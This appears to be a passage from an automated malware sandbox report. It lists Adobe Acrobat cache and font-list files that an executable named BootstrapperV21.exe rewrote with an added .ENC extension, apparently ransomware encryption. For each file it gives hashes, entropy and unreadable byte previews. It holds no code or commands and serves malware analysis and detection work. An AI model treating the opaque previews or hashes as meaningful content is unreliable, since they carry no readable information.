                                                                                        MD5:EEAC3D28010BC85AD79E148A69CC9659
                                                                                        SHA1:ED4AEAD6E92598B5091E00FEA3DCC31DE34044B3
                                                                                        SHA-256:709F4CC25B2E1530A0985FF9BA1D06435008EBD0439BF87A9960861CF6468AE3
                                                                                        SHA-512:AA4D6BBEC7E002AECA59CC6D56528A4C42778473EDEA64A27AB009AF1170E37B8E01CDA30FAA70A9226CE5D40B93F911D346E10041606457A4ADFA5221C22088
                                                                                        Malicious:false
                                                                                        Preview:...??..:L.3f.3.......|I....L.ys.g~l.%..o)iJ.......e.>.7iOl.j...g.._.1...kN'....R;.....G5..T.TB.7.<...T..W:.[.lv....!........~G.i.8..%.......W....<......D%L..VXs.dG!M`...}a.n...{(..''..@@.H*.]....tB..]..K...x.V.....G3...6.q^;h..l.ce.;@...~.M.T..G.P.v.}'t.Rv.+lWL@b.:^H.2..J..%..C...u..+....5..m$..c....S...;.j.rs.[T..$.7.%..#w.c,S.&....;3....:.&.%...E.y.3.........j..<.r.~Ze0..Y...V.I...%X......d...n........u.c0.Q_..0....G.N'.:.QH.....$|.H.^.%.g..|Y.0..4...7....'..aWY.Q.X$e..q.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:OpenPGP Public Key
                                                                                        Category:dropped
                                                                                        Size (bytes):48
                                                                                        Entropy (8bit):5.4599625007211605
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:r+OqThprQ6wbNcbVwOmH6:rQT/rGapwOl
                                                                                        MD5:17AF1BA22030E9228BD4A1DBA5228358
                                                                                        SHA1:A1B5AB3ED8F29BFA797B1CAE12B89A670DC8120D
                                                                                        SHA-256:72C739CEF90F4A749CCDDD581705440E4AEEF7A41730B9447ECA19362DAB3906
                                                                                        SHA-512:914484A3F247D789EF6BCA79FDEFEC0EC8F519A4042B34F3F6D3CB5BB59355A9D1F8742D69187E0370BAFC01324309A3153A4CCDC3831DB8C7D0CC4902D1FC23
                                                                                        Malicious:false
                                                                                        Preview:.B.i.x.+.Q.....+JP.....<.f_.N*.:.-.#g.....("..

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies-journal.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):20496
                                                                                        Entropy (8bit):7.992192442456385
                                                                                        Encrypted:true
                                                                                        SSDEEP:384:8QHG0c7b3gjcpQJeQn9ckTmC7Ek/lCiecHkS+ymRPRiv5fYp98ah19AMt4:8U2Ccxc9V7Ek3ecHklPiv9dMDvt4
                                                                                        MD5:A972B1E8A414181D9D97BDE825A4354A
                                                                                        SHA1:F3BDE8E960743150BFCB8BF5D8D767BAA38791D3
                                                                                        SHA-256:814EC7710516906C642F81FF821197D5E3C86844F4AE534BD2C11CF17F4163C9
                                                                                        SHA-512:2E5AEEBA5C41A5D8819C10C79067CAAE1C926ABA32DED28AED0F1E2E9152A518A7FE6B0136B024169A2400BCA62E937D03C3AD9DDB058DB049A0A55BFD5878AD
                                                                                        Malicious:false
                                                                                        Preview:zi..o.v.C.{4..j@.n....X..<..rs.E|(..0%+mV.t.$....n7i*.I.J...o...$8.c..._.)N(...}....;.E..AN..;..OnS&..{=..Ln.Z\9.u..m....G.]..F......i.H.#o...i..|.;./.,Y.5......k.!"....P.~by..|..D.}..`..*....@u.<..........j.F...1.......)........O.....;.M.{.g.F.....Q.5...@...U.m.y...k...ei..}Uace.B..Q..5T......H......c.?&.v........(.L............X(...>.xc.$B.,....=7..;VFl...+.$.t.t..W.........X.....9.!-..&*......[..2.W....p":........p.....S..f.T....E..?.U89e..=...i.(.?.F.l.(..T.../f2.9.!..y.o5....H..]Z=.:Xlr.Mh-p]n`.K....a.:.....3o@.t..4......LP.Z..vN.Q.@.M....H.W....0.k..b...<....oO...)z.!..O..3X.F.8.8....e.G5.9p......"...{.i_.f........D.eD..........f$(...5..x?. N.&..L.......O............j....#C.q.s~........"3@...5...%..+.W.8`..g..T....,.oh..R*fb5.8K..Nv.J.fe....j>.,..v.7d_@.. .p+&.v.n..$..'..|..;.'.Z,.1.MX.h*..jw.(...`AU.....lfpu.....Q.....!._..W...-D...0wbY....y..s..r.d....[..~]........<.....G..LM.,.#0..q$1{......a...........1-..W..F!.$".l...."^_..

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):96
                                                                                        Entropy (8bit):6.347932422573623
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rvNTZZbt7waGoC8y/sH+Zd/c6sIbeB909Qjs:7Nrt9xCxbZd/Lspvi
                                                                                        MD5:878BDAA8DC001008EC3D82CBF54765D7
                                                                                        SHA1:1D43C3A9321D4FC32C062BDFC6CA32EFF8815486
                                                                                        SHA-256:6EC2ACD50D671BA7D118D0C858AB21589CB5D0C4EF9AE83F6876066F3E90EDA8
                                                                                        SHA-512:E1EFD6E3D4D76E760F79562301ED98B17CE0448CEB8B820D99433BE0B7E4D780C8D3E4A37C0F825B3FADACC59BFB1D0227C9CA16C756FF2030E5E917BBCA810E
                                                                                        Malicious:false
                                                                                        Preview:...x;cJ....?.|E...~..-..K.e.,=.S^....g#..a..X.S...v..{.^......8..M..t.V.`X>.h|J@......Y.u .I

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\NetworkDataMigrated.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL-journal.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):36880
                                                                                        Entropy (8bit):7.995518206389454
                                                                                        Encrypted:true
                                                                                        SSDEEP:768:Uek4rN1HeeN8d4/8XfiFV2Ffr7Sh46PoFGyy0aHB9Wgkocd321C32FhTDtfyebc8:Nk+feG8to2FqikoFGyy1HXWgk5dOCktD
                                                                                        MD5:C70D5E0DB559F81F25F72D3BAC75CF2B
                                                                                        SHA1:C5DB3BBA6B527267FA1EE6134C3970939EE71DEB
                                                                                        SHA-256:52F2DFBD85E0239BBB4DC5DA87FF6A63EE0361AA43E56305F63BF0404198F5FA
                                                                                        SHA-512:242F2079938C4F3A9EC201D5911F7F991EBA65294639B003F8A39C13350184255641AFB1523016CE558C829CED5D15B9435CB8DF2204F9816CD9546FD5300CD8
                                                                                        Malicious:false
                                                                                        Preview:zi..o.v.C.{4..j@.is.p.l.>.{.e.u..m.q..N...@.I..O..d.t.\KmF..a6..(C..H..ab|x.D[?....l\..p.2k5@........;..|Lkb...h#o.4.d.b... ....]...<a~...F.\h.n@D\..".d..r$.U....C....r.pT......3..\L..{._.....|CPT......h.....h...p..;rq.1....)...DR..^.7...>L....t?..F.W....3#d L.Y....t.w.t.W./.rs.'r;0..~/.5Lo.P.Y.'.B.Ao..u9..Am..,..r...a...(.L.-.-5N"...L..s>,0.lq.&.*;.....E........L... C....rs.;............0.z..7^..Mev.0'.T..v*.3.....!<_.6...%&@@3#.0....w.go.~2|L..............+..A.]6.j.(8....o..B..p..;.Ls.E......3l...V.....0/V......,H.[o_.O..K.J..\ZB)S.7......K.....z.X.1[...w"..T..;p....Zv"..p..Z...R....&!.;..D{...e.........;:..0...L....q... SY...a..I.Zl2x.x.C.)I......_.F..0u..3.{.....@..D.'MWC....\.C.0.7M....f.A{.Y.tPEH..m^.&&ZM.......|...'.t.h....*.L..V.T.(`.+..[.....4J<..D...e...4bv.....T.....Y.TN....Nd.\I{...V...)5G.H93s...\W...g.m63.*.@T..jg.G.......B6.m....2..3.E...R.3.D....l<..S...l......I..B.d..0%.1P...vL.....X...9u..V...EM..a.a..SA...]y.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):288
                                                                                        Entropy (8bit):7.295526369510124
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:5R/w9c19jYNd1MRdCSRMwuQVw5a6p1oggGs26rSvH+RAMMOe:5y9cTkUUSRMRQVaDWrGs7SP+RPMOe
                                                                                        MD5:372EFC94118C26DB8ED874DCB528C724
                                                                                        SHA1:98BCD7FDEDC5A8F585D29DB6568C622236FFBDE9
                                                                                        SHA-256:E3C476229D074E1916C0DF6E26AC21A86308637FF40BC77283C9950E75C2085A
                                                                                        SHA-512:E6CA6D3E21D9F2DA25A6ECD19D2DB6CF3BA3EFB977462021BE04FD3B4946DC8DEF48DE68D7D3ECF584FE91F37A27D0B86E8876C9464C1A79A9BA96DA214F2254
                                                                                        Malicious:false
                                                                                        Preview:.WW...L.....Hr...]..~p.].[.;|...T..36..q.E}6.^...^?..s..9g#1.DBk.....GFV..2.l....H....{-...A.M.....^.p..bq.........f..%,....E..G.<......b.I.ebBnk:W_U4k*j..9...%..9lB+.8.........J...)..t..e|.....:a......[........U....$.2:...C....[.w. ..T@..>!....T....v...$......xi#...=.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\CURRENT.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32
                                                                                        Entropy (8bit):4.663909765557392
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:5ssJHQOOsaVI0n:sOOJVI0n
                                                                                        MD5:707AA11AE4BB330C8FF4314ACCAB2D75
                                                                                        SHA1:8C63AAB10596784BFA694B7B38037CC21816F34E
                                                                                        SHA-256:0BCACBFFF916D3547AF4BB7375ACDA894F9885940E91146695E21174B2A5F927
                                                                                        SHA-512:2F0645A35797DDACF1A058B399E4BF3C2FBA61C1C09E874DD6E1C14669C4BB2A12CEB117F72BB5630D73FCF99289DA94E5B36126EEEF73F9D9881968AC50B4E3
                                                                                        Malicious:false
                                                                                        Preview:........W..j..+.....`3.S.W...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOCK.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):336
                                                                                        Entropy (8bit):7.396538573080474
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:+yFhBlEKMSQJ9Zm4OJXLRpYTLtopB2Xjx7l89Xf5fsRlwoErTTZ7UOmB:NbTEKzQJ/WJbR2TLmv6CfYJEzZQOK
                                                                                        MD5:B2C5A090392A4A353C63D7450139D6D1
                                                                                        SHA1:451BF5BECCDEE6C8A277D46291860223114C50CC
                                                                                        SHA-256:EFB1F4E002D70B39C16400BC5562E8EC1E0F73838A491F367740228007BFFD74
                                                                                        SHA-512:FBB9E2A90DDB84DA1E41FF240DF99947199455D3CF38F83AA37FF4F1E2649A94851DF5349BF4F2F2A01FE3C38AF5DF14D1B70426DC7D8AB8E0CB6FEFCBCC7540
                                                                                        Malicious:false
                                                                                        Preview:._O.Hh..]$}.9.H{...;7KG.f.i.ec.h..`.,..{.Z...0...>pe.YNp.+....BTH..d...te.M....+MEK...96_).......$.r.."E.LBl.....w.S..u.....a.7........-.t0.....z8.$U.W.gMC..k@....Dj....87.$.'.f|F..c.....h..U.RV.[X.H$..3.E.,...a..lr....3.x.62`....v......K.-....R8.0...~.S.)v..]...{.."b.|....O>..a.Jv.=IsPd..I..&1i>tC..!0.O&...av.._...0

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):288
                                                                                        Entropy (8bit):7.267312143749456
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:XDvKkybMDjJu4A3PA+lzfQ3Gh7qCecd5/R4X0qa6Vv/I:XDvkbMDLA3oIz4WtzDl4XsOg
                                                                                        MD5:E164692AD856CE7A4576F4A78555F360
                                                                                        SHA1:6E605CD7598BA96BCCC25BE46D28A80937F13EC7
                                                                                        SHA-256:C84A6A336FDF9442D1CA994EA4CCBD515DACB6785709468F290ACFCE6564EBF6
                                                                                        SHA-512:3191450E5F095A757B7B42ABF32704994F775B507028C1FE38461FB01F6779B3388FBB87BC02A9B61D4F40F1BDB44053CD31AD311107D1167278308390D61FBC
                                                                                        Malicious:false
                                                                                        Preview:.]j..(-.Y.Z.-[.E....IKec...&...t..;....1...6...=....a_...}.).....B}..{:7.>.o...s.Jd".{.9?'.^..j....(..?ZHy..)J..o.Xn7......L..J..b......s..@...^O.@3h...=..b....SP nU.H.X/ ...+Ir..n..v.*.3M........}..Qc..]....T.........Mz....*..@.f....sX......."6........;....8.1.HD.......d..

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\MANIFEST-000001.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:OpenPGP Public Key
                                                                                        Category:dropped
                                                                                        Size (bytes):48
                                                                                        Entropy (8bit):5.4599625007211605
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:r+OqThprQ6wbNcbVwOmH6:rQT/rGapwOl
                                                                                        MD5:17AF1BA22030E9228BD4A1DBA5228358
                                                                                        SHA1:A1B5AB3ED8F29BFA797B1CAE12B89A670DC8120D
                                                                                        SHA-256:72C739CEF90F4A749CCDDD581705440E4AEEF7A41730B9447ECA19362DAB3906
                                                                                        SHA-512:914484A3F247D789EF6BCA79FDEFEC0EC8F519A4042B34F3F6D3CB5BB59355A9D1F8742D69187E0370BAFC01324309A3153A4CCDC3831DB8C7D0CC4902D1FC23
                                                                                        Malicious:false
                                                                                        Preview:.B.i.x.+.Q.....+JP.....<.f_.N*.:.-.#g.....("..

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):131088
                                                                                        Entropy (8bit):7.998728540746399
                                                                                        Encrypted:true
                                                                                        SSDEEP:3072:6kC069qCOREFxlI8kfsOegVanbRCfoZJeXdI9m/EA1V:6kCvOOU8kkgUnbR9LeW9mMEV
                                                                                        MD5:E253D0FC92D6408066BD4D02526FACD3
                                                                                        SHA1:3C8A989530F29A22682C56CA4A3366AFDBD62A76
                                                                                        SHA-256:5D81CE6A37C89AE97655EEE7F676BB3EE37805AE93CDEAE6F2302F357A8DB5E4
                                                                                        SHA-512:F7FC85619CDA7EE113C45260F3F102C281DB6D1068BF236FD7B225406DA83D22A917B91BCB3E6867A22A723B160884336F9E1E2D8BEA0631BAA4B380C8CF951C
                                                                                        Malicious:false
                                                                                        Preview:0!L[...O:3..o;....S....1..q.&..gV ...X..Q<..+...... ...c.<..}6.......^.s.0.(d.W.6..,V..<.cmH..g.>..m|W....PqZd........'........_...$.1IP.pd.n.=F..oI!....fyL.t6..e..w.1.<.r9.d.B6.m.g.P...ze....&JH....W..........NT].s..:...AI'....`.b!r...I...3.X.|.+......%(..YjAG)..vC.J;%..<.Q......_p!g...a;Y.Y.E.F....P....#.O....S.....b....A...=*..y)..'B\.,.q......<..........bk...H.....TV..{.V.....U^.F.<..x@...h....R.W.-....@.e..n... ....Ed.+s...........H.Gk...${......+G...C...M|..B.F.._6.V...S`.V...sweu..]n.).....Rep`....#)....;.bD...g..i.'a.?0.u.$i.)...o.{..n..n.9..Z..k...X.R.....p.d.vza.A...&.=.........YT..w.....4@...c.../i..ze9.MQa.`c..>.......\B.?...P...W.....N.yI...Y_....83G.....1.3(0i..F.u.......*Elz....=.Z..y.9.O...~...j..[...i..U./..RW..>|$..r..9^..Nv..fE/...L.LQ.O.43#..:....k.cJ.<Y.4..L...%*.l.r.5|.**>SS.ro.l._.Q.\...xZ...O..q W...`mf...@u..my..n`N*B..:)..|O`...6.4...cG...#.I.6.v....5.K..p...ie$*1.G..J....,.......2v...$..;U....@s..X.,`.-lrq~X

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1248
                                                                                        Entropy (8bit):7.814788837942616
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:cpTUmzQTnWdgmD0sFyZiw1sP8i0G2w4jeG8VsukX3UDUhWosXKk:6TLQKmUDFyr1sj0vwgnnf0Z
                                                                                        MD5:CD0F202C7655487C6E513D39AD281D43
                                                                                        SHA1:EF41CE252D839B5694BF626F3C9A5831C7711B87
                                                                                        SHA-256:37C0BDC67FBFED7EBA4CB4B51CAB01BB6B43B4CE260B027B78CC5BFA1F73D69A
                                                                                        SHA-512:F8129C5938FF97E492464D0CAEDCFF43F56DE9D51C870CCA3F4AD75843DDDF4CAF21337BAF878EEB002AD9A9A6C9CCE5F113DFD5724FC6FC6F257A46E2C6F3CA
                                                                                        Malicious:false
                                                                                        Preview:1..p...IjyC.o...5.-..L+..,.....EF*.S...:A..&h/.<.!2.|5&.A..z.&...y...P.KU..fe.'.7c...-\%}G>..........R..>.1...I...484...K.......28._.w3.c7N..;=.\.h?......@...'.....B.,..j.r(.&.v...o..P..7{...$.R..1....Hm.F..wOa.R.DV......Et....;..6..TD...=.Y.....{I...{..uq.....r).fi......P...a..:...8Z.....h.........e../.P.+.......s.I.~>.a.S..U.lW...&.m..1A...$..jc]........a.m@...I.o..)T..b!6&..Z....@B...V.P.dh..Oh..}.E6.4..Y."6.d..2.....yv8.DQ.......lH.a>F.......7.......{)_. ..!..Kdo.bk...enAEA`b.$.Rr.S..W.....dn.[&.P...Z..5.e.b..m...sh.F...Y..;..?k.?..z$...r...0u."cD.!I..a..+.Gkq...r.....7.DL4....u..P...(z...A ....B.g7....v3X`........u.V..6.]....R... ...LfDn.R..M.Z.....5.{}i.yv.~..N.....K...+..'.1Q..x..4yJ.3q.....h...Si.b.....O.;..i....5...S..a.. 8.YD......].z.S ...7Q9..d*..P.l.J..... /....1..e.b...|.tY$H...@.m;.....\.Fy...@..8..1...P.....y..S.JNg...3.....D...8:(....Kl.!.........n.....T...g.."A.K.*LnR.*a.^<.^.f3...Y.U...RA..nsb,o]2...uq.P.>.)4J....

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):185104
                                                                                        Entropy (8bit):7.998992007785882
                                                                                        Encrypted:true
                                                                                        SSDEEP:3072:emM3DyEmJVH4fi5wblJfw//bgMZ2DRQejNn3OyJSmOXqC7x7BAmKu9IIknYramv7:emx1bYfiWRJf4D2FQwh3UmkN7x7BUIk4
                                                                                        MD5:0A6FA2E1D078493FD5FA95635E424930
                                                                                        SHA1:A543BB14950A882BBF163C77BB36DEF8FB35215F
                                                                                        SHA-256:18A25B62D7FF6FD28BCDA831CD20DBDADCE3E4D5E85F0890CE845CE903E98568
                                                                                        SHA-512:E3DA7C2A46444BE373772892218739BE4DF1C367DA6CEDDC7B84D2369DCCEE5DF339ABFDF6361DCED16A3893EBF4D1431187CCC49533290268107790BE91ABBA
                                                                                        Malicious:false
                                                                                        Preview:1..p...IjyC.o...5.-..L+..,.....EF*.S...:A..&hc/.E.Vr=..<9~.G..gv1Y..y..n.W.DQ.xe..h....2.S....j.YrI....Z.l..\O}.9x>v...U)m.......ZhX...W..3...j../...Fi..F..'7.z +%...E0.N...KR)(........e..0.c.....{..^......*.=..`rx.0...D..w(.....j|oT~r...#..Z.RD....`....ue..>.;....sc.._b..E..;.k.. ..B.'.........m$...:vc.e|..v...&...WP.pcK..nV...7..u.X.xP.9.KV..C.....T..E....$@:.UY..m.......".>~.Z{...i[...9.F....31..PZ...NO.....7{t...%.}.i"...B>.p.5.s.#..P.&*...t."5i.N.].....]...V$..R...ln..-..Q3&...Q..M...}......AL.....m.....|p.e..k.P..~&...}Fz...d.....`.7,(.w....@ P...m........E...4.FZ.)...x..6.{e@.......?s..r/.\...w.-.|s1.vL>.....v.2F...E.f.)J......?...A.....,.o..w*...x......4.v .M.I.N.!o..Ad.....E.[`.a@....o.^.#>.}..2~3.x.5..M..(xpo]->:...(g0..#.J,.kB..K ......7..(.q.SaR.U.4.U.g.x...4&f....W%-.2=K...S..Z.~"..O.VO..u.)...r.....j."...>fS.Mxntc'.v.......O..Y..y.VUW..q.........._..z...9N.1}...n..I:[fh..%...Zc...mC.].Q..<../.1....&...-$.e.w.}.5.......

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):10896
                                                                                        Entropy (8bit):7.984806531972225
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CSIYAW22yktYGzdZdrm7cm1OqUR2cFFbVtvtr+vR5NFGnUJW4zD+:UYpjBtYNp102cj4fIUJW4/+
                                                                                        MD5:548057943C3648721DBC34EFCAFF1A22
                                                                                        SHA1:20686FDDBCAA2F8B0E29B6CA3EEE1A8FBCEAAEA4
                                                                                        SHA-256:2101B81336418C48A586E2B2DD6D59CBE46CB8910B62F5FC41160E61BC6C4F29
                                                                                        SHA-512:206F0E6E10DA1F887BFA254A329C448B5153B091F0050A6A2662A26E5B0892501FF0BC22442E9A5E3525A4D27635E35E33C49906865D19763F3E98429E5F1779
                                                                                        Malicious:false
                                                                                        Preview:1..p...IjyC.o...5.-..L+..,.....EF*.S...:A..&h/.<.!2.|5&.A..z.&...y...P.KU..fe.'.7c...-\%}G>..........R..>.1...I...484...K.......28._.w3.c7N..;=.\.h?......@...'.....B.,..j.r(.&.v...o..P..7{...$.R..1....Hm.F..wOa.R.DV......Et....;..6..TD...=.Y.....{I...{..uq.....r).fi......P...a..:...8Z.....h.........e../.P.+.......s.I.~>.a.S..U.lW...&.m..1A...$..jc]........a.m@...I.o..)T..b!6&..Z....@B...V.P.dh..Oh..}.E6.4..Y."6.d..2.....yv8.DQ.......lH.a>F.......7.......{)_. ..!..Kdo.bk...enAEA`b.$.Rr.S..W.....dn.[&.P...Z..5.e.b..m...sh.F...Y..;..?k.?..z$...r...0u."cD.!I..a..+.Gkq...r.....7.DL4....u..P...(z...A ....B.g7....v3X`........u.V..6.]....R... ...LfDn.R..M.Z.....5.{}i.yv.~..N.....K...+..'.1Q..x..4yJ.3q.....h...Si.b.....O.;..i....5...S..a.. 8.YD......].z.S ...7Q9..d*..P.l.J..... /....1..e.b...|.tY$H...@.m;.....\.Fy...@..8..1...P.....y..S.JNg...3.....D...8:(....Kl.!.........n.....T...g.."A.K.*LnR.*a.^<.^.f3...Y.U...RA..nsb,o]2...uq.P.>.)4J....

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):227008
                                                                                        Entropy (8bit):7.999266443291869
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:TBgVxUJPSrzymAfUP3VOpUDgoV5eg2SeHwMmxh0:TBdPSPWUo1gxh0
                                                                                        MD5:3297FD3729F86FA8D54457AF569E3FB6
                                                                                        SHA1:0C6C984F5C28F0CDF7B628D5328F0C1AB31D0458
                                                                                        SHA-256:276ADE0C3AA56633B09C4C0D2682AE850C9B264C32480B21E863A5C9D5081666
                                                                                        SHA-512:232191B1E90B5A8B699FC58A2A673F584FBD11734760201CE1A28C318B331A4B5EC99F8F204B3EF700C24A63399010AF26168BBEF304AC05CB39AA0462E4E286
                                                                                        Malicious:false
